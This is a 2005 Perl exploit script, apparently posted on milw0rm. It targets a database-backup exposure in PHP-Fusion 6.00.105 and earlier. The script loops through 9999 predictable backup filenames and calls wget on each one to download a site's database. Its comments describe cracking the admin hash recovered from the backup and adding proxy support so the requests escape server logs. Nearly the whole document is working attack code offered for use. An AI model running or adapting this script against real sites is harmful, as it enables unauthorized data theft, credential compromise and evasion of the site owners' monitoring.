#!/usr/bin/perl ###################################################### # D A R K A S S A S S I N S C R E W 2 0 0 5 # ###################################################### # Dark Assassins - http://dark-assassins.com/ # # Visit us on IRC @ irc.tddirc.net #DarkAssassins # ###################################################### # phpfusiondb.pl; Version 0.1 22/06/05 # # PHP-Fusion db backup proof-of-concept by Easyex # # Database backup vuln in v6.00.105 and below # ###################################################### # Description: When a db (database) backup is made # # it is saved in /administration/db_backups/ on 6.0 # # and on 5.0 it is saved in /fusion_admin/db_backups/# # The backup file can be saved in 2 formats: .sql or # # .sql.gz and is hidden by a blank index.php file but# # can be downloaded client-side, The filename is for # # example : backup_2005-06-22_2208.sql.gz so what we # # can do is generate 0001 to 9999 and request the # # file and download it. If a db file is found an # # attacker can get the admin hash and crack it or # # retrieve other sensitive information from the db! # ###################################################### # 9999 requests to the host is alot, And would get noticed in the server log! # If you re-coded your own script with proxy support you would be fine. # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly # backup the php-fusiondatabase. my $wget='wget'; my $count='0'; my $target; if (@ARGV < 4) { print "\n"; print "Welcome to the PHP-Fusion db backup vulnerability\n"; print "Coded by Easyex from the Dark Assassins crew\n"; print "\n"; print "Usage: phpfusiondb.pl \n"; print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n"; print "\n"; exit(); } my $host = $ARGV[0]; my $ver = $ARGV[1]; my $file = $ARGV[2]; my $extension = $ARGV[3]; if ($ver eq "6") { $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder } if ($ver eq "5") { $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder } print "\n"; print "Welcome to the PHP-Fusion db backup vulnerability\n"; print "Coded by Easyex from the Dark Assassins crew\n"; print "\n"; print "Host: $host\n"; print "Directory: $dir\n"; print "File: $file + 0001 to 9999\n"; print "Extension: $extension\n"; print "\n"; print "Attempting to find a db backup file on $host\n"; for($count=0;$count<9999;$count++) { $target=$host.$dir.$file.sprintf("%04d", $count).$extension; system("$wget $target"); } # milw0rm.com [2005-06-25]